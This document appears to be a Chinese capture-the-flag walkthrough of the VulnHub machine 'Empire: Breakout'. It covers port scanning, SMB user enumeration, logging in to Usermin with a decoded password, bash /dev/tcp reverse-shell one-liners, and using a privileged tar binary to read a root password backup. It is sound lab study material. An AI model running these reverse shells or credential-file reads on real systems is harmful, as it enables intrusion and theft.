vulnhub靶机22 02-Breakout.zip

目录

环境搭建

信息收集

扫描靶机

扫描端口开放情况

挖掘思路——根据端口开放情况查找对应服务的漏洞

访问80端口：

访问10000端口和20000端口

登录

提权

---

靶机下载地址https://download.vulnhub.com/empire/02-Breakout.zip
难度： 简单

网络模式：桥接
IP 地址：自动分配

环境搭建

vmware  靶机 ip:192.168.43.56

 vmware 攻击机kali 192.168.43.191

 

信息收集

扫描靶机

arp-scan -l

 

 扫描到同一网段的靶机，确认mac地址

扫描端口开放情况

 

nmap -A 192.168.43.56 -p- -sS -sV -T4

 

扫描到开放的端口为80 139 445 10000 20000

挖掘思路——根据端口开放情况查找对应服务的漏洞

• apache 2.4.51
• smb 4.6.2
• webmin

访问80端口：

查看网页源码，发现一串秘文

 

搜索对应在线解密网站，得到一串数字

.2uqPEfj3D<P'a-3

 

 

访问10000端口和20000端口

1. 发现是登录界面，需要账号和密码

 

2.通过弱口令密码尝试，登录失败

3.由于之前nmap扫描出来系统装了 Samba 软件，所以用 Enum4linux 扫描一下 SMB 服务器中的用户：

enum4linux -a 192.168.43.56

扫描出一个用户，用户名为cyber

 

登录

试着用之前解密的一段密码 结合 samba账号的用户名登录10000和20000端口的网页

• 10000端口 登陆失败

 

• 20000端口 登陆成功

 

登录之后发现左下角可以执行系统命令

 

反弹shell

外网机器执行 kali打开端口监听

nc -lvp 8888    //外网机器执行

内网机器执行

bash -i >& /dev/tcp/192.168.43.191/8888 0>&1   //内网机器执行

或者在 bash 下执行是没问题的但是在其他 shell 下执行会报错所以更健壮的写法是

bash -c 'bash -i >& /dev/tcp/外网机器IP/8787 0>&1'

实际上还可以这样写

bash -c 'bash -i &> /dev/tcp/外网机器IP/8787 <&1'

 

注：以上三条shell选择一条即可

提权

反弹成功 内网机器反弹到外网 执行系统命令

 

第一个flag

[cyber@breakout ~]$ ls
[cyber@breakout ~]$ ls -la
cat user.txt

 

 

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

获取root权限

[cyber@breakout ~]$ ls
......
[cyber@breakout ~]$ cd /var
[cyber@breakout var]$ ls -la
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
usermin
webmin
www
[cyber@breakout var]$ cd backups
[cyber@breakout backups]$ ls
apt.extended_states.0
[cyber@breakout backups]$ cd
[cyber@breakout backups]$ cd
[cyber@breakout backups]$ cd /
[cyber@breakout /]$ cd /var/backups
[cyber@breakout backups]$ ls -la
total 28
drwxr-xr-x  2 root root  4096 Aug  1 10:04 .
drwxr-xr-x 14 root root  4096 Oct 19  2021 ..
-rw-r--r--  1 root root 12732 Oct 19  2021 apt.extended_states.0
-rw-------  1 root root    17 Oct 20  2021 .old_pass.bak

[cyber@breakout backups]$ cd ~
[cyber@breakout ~]$ ./tar -cf bak.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
[cyber@breakout ~]$ tar -xf bak.tar
[cyber@breakout ~]$ ls -la

total 596
drwxr-xr-x  9 cyber cyber   4096 Aug  1 22:33 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-r--r--  1 cyber cyber  10240 Aug  1 22:33 bak.tar
-rw-------  1 cyber cyber   1284 Aug  1 22:24 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber     45 Aug  1 11:30 pass.zip.gz
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
-rw-r--r--  1 cyber cyber     67 Aug  1 10:38 shell.php
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Aug  1 10:38 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt
drwxr-xr-x  3 cyber cyber   4096 Aug  1 22:33 var

[cyber@breakout ~]$ ./tar -xf bak.tar
[cyber@breakout ~]$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h        //得到root密码

切换账号

su root
Ts&4&YurgtRX(=~h       //root密码

 

ls
whoami 
发现为root,切换成功

 

 

注：

浏览器执行会错误，需要在外网机器执行

输入密码之后无反应，直接输入whoami 当前用户为root

 

第二个flag

cd ~
ls -la
ls r00t.txt
cat r00t.txt

 

 

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

 

 结束

参考文章：https://www.cnblogs.com/2022zzt/p/15950045.html

 (115条消息) 【Vulnhub靶场】Breakout_Nailaoyyds的博客-CSDN博客

 (115条消息) 靶机练习 No.22 Vulnhub靶机 Breakout samba，webmin，tar提权_YouthBelief的博客-CSDN博客_dawn 靶机

Vulnhub 靶场 EMPIRE: BREAKOUT - sainet - 博客园 (cnblogs.com)